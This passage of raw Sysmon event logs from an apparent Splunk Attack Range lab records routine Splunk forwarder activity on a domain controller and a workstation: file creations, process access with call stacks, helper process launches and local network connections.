Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6D586F885F6C527F0CC357CBCABE72E,SHA256=C0770F5DEA9691432C5A15A992E4E36AE02820F1075234922DE6FA56B43CCD1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081279Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:00.228{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99938CB44E88747CF224886B336C5C34,SHA256=9B755D62DF532B645C721BDEB6B403CE7197EC087433F915151499F277A9B679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081278Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:00.228{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB746ED7CBC2B17690E2D0FB77EA864E,SHA256=BBA04F8BA2E4420E3407A85EFAB2ECC4E124307936E79D81C22F96DE987FC3D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081277Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:00.025{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B73980F37354E49ADE54C7EAEA08B9DA,SHA256=C63DBB59B50892A56A45C263645203C68F0959938E48444B5584BB07C3AC717B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103360Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.495{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B228-615A-C501-00000000FC01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103359Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.495{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103358Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.495{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103357Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.495{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103356Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.495{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103355Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.495{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B228-615A-C501-00000000FC01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103354Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.495{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B228-615A-C501-00000000FC01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103353Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.496{58E9C193-B228-615A-C501-00000000FC01}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000103364Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:00.387{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49517-false10.0.1.12-8000- 23542300x8000000000000000103363Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:01.542{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14444F75A818BCDB4480583C5BC7FE98,SHA256=6E4C1C692EB502015A0C8BE1D9BCF7DCAF58976D6A1811F969B146C5B0D11B6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081281Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:58.624{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50016-false10.0.1.12-8000- 23542300x800000000000000081280Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:01.025{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0119C98F1FAA53FE3EEA3D5AE88189A,SHA256=4C3C358E394F642F3B3C8375A1744F8453BCDE820299CC2DC9CD0C274FFBDEEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103374Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.604{58E9C193-B22A-615A-C601-00000000FC01}4396576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103373Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.559{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4E64E81B62D7F15DB9AEFBAA3FFDA2F,SHA256=BDE9993FC99A656EAF13A3771B28C1356AAA7EBEF29B61C0AAB558998633AFB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081282Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:02.025{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C21B887CC1AB2A1D1435EB0CB1F798E8,SHA256=2CD2AE434636602081BC4D7D6F89C04B771122668D0B0BA74ED397212EAA79F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103372Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.339{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B22A-615A-C601-00000000FC01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103371Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.339{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103370Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.339{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103369Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.339{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103368Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.339{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103367Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.339{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B22A-615A-C601-00000000FC01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103366Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.339{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B22A-615A-C601-00000000FC01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103365Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:02.339{58E9C193-B22A-615A-C601-00000000FC01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000103393Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.932{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B22B-615A-C801-00000000FC01}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103392Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.932{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103391Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.932{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103390Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.932{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103389Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.932{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103388Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.932{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B22B-615A-C801-00000000FC01}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103387Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.932{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B22B-615A-C801-00000000FC01}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 